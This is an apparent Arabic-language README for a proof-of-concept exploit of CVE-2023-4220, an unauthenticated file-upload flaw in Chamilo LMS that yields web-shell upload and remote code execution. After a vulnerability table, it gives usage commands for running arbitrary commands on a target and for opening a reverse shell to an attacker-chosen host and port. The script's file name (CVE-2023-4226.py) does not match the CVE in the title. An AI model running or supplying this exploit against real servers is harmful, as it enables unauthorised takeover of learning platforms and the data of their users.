
POC لـ CVE-2023-4220 - تنفيذ كود عن بُعد عبر تحميل ملف كبير غير موثق في Chamilo LMS
| المنتج | Chamilo |
|---|
| البائع | Chamilo |
| الخطورة | عالي - قد يستغل الخصوم ثغرات برمجية للحصول على تنفيذ كود عن بعد غير مصادق عليه. |
| الإصدارات المتأثرة | <= v1.11.24 |
| الإصدارات المختبرة | v1.11.24 (أحدث إصدار وقت الكتابة) |
| معرف CVE | CVE-2023-4220 |
| وصف CVE | رفع ملف غير مقيد في وظيفة رفع الملفات الكبيرة في /main/inc/lib/javascript/bigupload/inc/bigUpload.php في Chamilo LMS <= v1.11.24 يسمح للمهاجمين غير المصادقين بتنفيذ هجمات تخزينية عبر المواقع (XSS) والحصول على تنفيذ كود عن بعد عبر رفع شل ويب. |
| تصنيف CWE | CWE-434: رفع غير مقيد لملف بنوع خطير |
| تصنيف CAPEC | CAPEC-650: رفع شل ويب لخادم ويب |
لتنفيذ الأوامر مباشرة، استخدم الأمر التالي:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
للحصول على شل عكسي، استخدم الأمر التالي:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>